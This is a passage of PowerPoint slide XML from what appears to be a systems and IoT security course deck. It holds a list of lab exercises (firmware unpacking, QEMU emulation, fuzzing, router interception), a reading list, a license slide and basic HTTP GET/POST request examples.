              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>MITM or proxy connections through a compromised router and log IP destinations.  Find all the open ports.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Classify all security critical configuration files on a Linux system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Open an IoT partition and read the file system by mounting it and using standard utilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Unpack an IoT update and read the file system and kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Simulate some IoT firmware using QEMU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>"Fuzz" some firmware?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>How would you deploy additional software to allow IoT devices to become "edge computing" resources?  What problems would such an architecture be good for?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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180</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10145719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76" y="113983"/>
            <a:ext cx="11371990" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400"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498764" y="1576552"/>
            <a:ext cx="11555080" cy="4634581"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Tannenbaum, Operating systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Bryant and O’Halleron, Computer Systems, a Programmer’s perspective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lions, Commentary on UNIX 6th Edition, with Source Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Leffler et al, The Design and Implementation of the 4.3 BSD UNIX Operating System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bovet, Understanding the Linux Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Stallings, Network security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Lampson, Notes on Computer System Design.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Thompson, Reflections on Trust</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Kurose and Ross, Computer networking</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Trappe and Washington, Introduction to Cryptography</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Kerrisk, The Linux Programming Interface.</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Richie and Thompson, The UNIX Operating system. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://people.eecs.berkeley.edu/~brewer/cs262/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unix.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="fr" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial"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181</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="328835335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113983"/>
            <a:ext cx="11837773" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400"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389467" y="1303867"/>
            <a:ext cx="11392528" cy="4950531"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Angr, UCSB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Mourani, Securing and Optimizing Linux: The Ultimate Solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Shacham, Hovav; Buchanan, Erik; Roemer, Ryan; Savage, Stefan. Return-Oriented Programming: Exploits Without Code Injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Chris Lomont, x86 and Malware Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Aaron Ballman, SEI CERT C++ Coding Standard Rules </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Microsoft whitepaper: </a:t>
            </a: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https://www.microsoft.com/en-us/research/wpcontent/uploads/2017/03/SevenPropertiesofHighlySecureDevices.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Fabrice Bellard, QEMU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Aaron Guzman, IoT Firmware Exploitation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pP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https://en.wikipedia.org/wiki/Das_U-Boot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"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https://github.com/u-boot/u-boot</a:t>
            </a:r>
            <a:endParaRPr lang="fr" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial"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182</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="153893904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35" y="113983"/>
            <a:ext cx="11747471" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>License</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2206" y="1598624"/>
            <a:ext cx="11582400" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This material is licensed under Apache License, Version 2.0, January 2004.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Use, duplication or distribution of this material is subject to this license and any such use, duplication or distribution constitutes consent to license terms.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>You can find the full text of the license at: http://www.apache.org/licenses/.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183</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21514089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03815"/>
            <a:ext cx="8229600" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>HTTP protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239485" y="1484026"/>
            <a:ext cx="6071374" cy="5170159"/>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Protocol is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F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sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, TCP substrate protocol is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="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Get</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>GET  HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host: google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Intentional spare line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>GET /about/ HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host: google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>GET /search?q=cat HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host: google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000"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184</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E193A57C-85FA-E74B-96F2-560F7A86F08E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6596819" y="1484026"/>
            <a:ext cx="5381074" cy="49198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Post</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>POST /folder/spot HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host: manferdelli.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Content-Type: application/x-www-form-urlencoded</a:t>
